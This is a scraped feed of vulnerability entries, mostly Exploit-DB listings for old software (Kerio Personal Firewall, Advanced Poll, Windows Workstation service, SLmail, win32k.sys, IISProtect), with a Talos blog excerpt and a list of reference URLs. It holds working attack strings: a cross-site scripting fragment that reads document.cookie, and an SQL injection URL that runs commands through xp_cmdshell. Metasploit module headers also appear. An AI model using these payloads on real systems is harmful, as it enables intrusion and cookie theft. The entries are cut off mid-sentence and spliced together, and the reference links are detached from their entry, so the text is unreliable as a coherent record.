This module exploits a stack buffer overflow in Kerio Personal Firewall
administration authentication process. This module has only been tested
against Kerio Personal Firewall 2 (2.1.4).
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9525 $',
'References' =>
[
Exploit-DB
Advanced Poll 2.0 - 'mysql_host' Cross-Site Scripting
exploitdb·2010-05-10
CVE-2010-2003 Advanced Poll 2.0 - 'mysql_host' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/40045/info
Advanced Poll is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Advanced Poll 2.08 is vulnerable; other versions may also be affected.
alert(document.cookie);">
document.main.submit();
Exploit-DB
Microsoft Workstation Service - NetAddAlternateComputerName Overflow (MS03-049) (Metasploit)
exploitdb·2010-05-09
CVE-2003-0812 Microsoft Workstation Service - NetAddAlternateComputerName Overflow (MS03-049) (Metasploit)
---
##
# $Id: ms03_049_netapi.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Workstation Service NetAddAlternateComputerName Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the NetApi32 NetAddAlternateComputerName
function using the Workstation service in Windows XP.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[
Exploit-DB
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2003-0264 Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit)
---
##
# $Id: seattlelab_pass.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Seattle Lab Mail 5.5 POP3 Buffer Overflow',
'Description' => %q{
There exists an unauthenticated buffer overflow vulnerability
in the POP3 server of Seattle Lab Mail 5.5 when sending a password
with excessive length.
Successful exploitation should not crash either the
service or the server; however, after initial use the
port cannot be reused for s
Exploit-DB
Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service
exploitdb·2010-04-22
CVE-2010-1734 Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service
---
/*
Windows 2000/XP/2003 win32k.sys SfnINSTRING local kernel Denial of Service Vulnerability
Affected: Microsoft Windows 2000/XP/2003 (full patch)
Author: MJ0011
Published: 2010-04-22
Vulnerability Details:
In Win32k.sys, DispatchMessage ultimately calls xxxDefWindowProc. When handling certain messages, that function dispatches through the gapfnScSendMessage function table; on 2000/XP/2003, message number 0x4c is handled by SfnINSTRING. When lParam is not empty, this function treats lParam directly as a memory pointer and reads data directly from that address. Although the function uses SEH, as long as the kernel address transmission
Exploit-DB
Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service
exploitdb·2010-04-22
CVE-2010-1894 Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service
---
/*
Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY local kernel Denial of Service Vulnerability
Affected: Microsoft Windows 2000/XP/2003 (full patch)
Author: MJ0011
Published: 2010-04-22
Vulnerability Details:
In Win32k.sys, DispatchMessage ultimately calls xxxDefWindowProc. When handling certain messages, that function dispatches through the gapfnScSendMessage function table; on 2000/XP/2003, message number 0x4c is handled by SfnLOGONNOTIFY. When wParam == 4/13/12, this function reads data directly from lParam. Although the function uses SEH, as long as the kernel passes the wrong address, it will still le
Exploit-DB
IISProtect 2.1/2.2 - Web Administration Interface SQL Injection
exploitdb·2003-05-23
CVE-2003-0377 IISProtect 2.1/2.2 - Web Administration Interface SQL Injection
---
source: https://www.securityfocus.com/bid/7675/info
The IISProtect web administration interface does not properly sanitize user input. This could allow for SQL injection attacks on a Microsoft IIS server running IISProtect.
Successful exploitation could result in a compromise of the IISProtect server, attacks on the database or other consequences.
http://www.example.com/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr';exec%20master..xp_cmdshell'ping%2010.10.10.11';--
This example invokes the 'xp_cmdshell' stored procedure to execute the ping command on the host operating system.
Talos
Increase in attacks on CVE-2010-1885
blogs_talos·2010-07-07·CVSS 9.3
CVE-2010-1885 [CRITICAL] Increase in attacks on CVE-2010-1885
Microsoft is warning that there has been an increase in attacks against a zero-day vulnerability in Microsoft Help and Support Center. The vulnerability is due to an error when using invalid hexadecimal characters in the search topic parameter of a URI. It can be used to bypass restrictions normally imposed by a command-line argument to load arbitrary help documents. Proof-of-concept code has been available since at least mid-June and has been proven to work with Windows XP and Windows Server 2003; other versions may also be affected. While a patch is still not available, you should plan on patching as soon as one is. In the meantime, be careful or, better, unregister the HCP protocol (manually, or by using this tool provided by Microsoft). However, doing so will break all local links that
http://osvdb.org/64524
http://packetstormsecurity.org/1005-exploits/advancedpoll208-xss.txt
http://secunia.com/advisories/39768
http://www.htbridge.ch/advisory/xss_vulnerability_in_advanced_poll.html
http://www.securityfocus.com/archive/1/511210/100/0/threaded
http://www.securityfocus.com/bid/40045
https://exchange.xforce.ibmcloud.com/vulnerabilities/58503
Published: 2010-05-20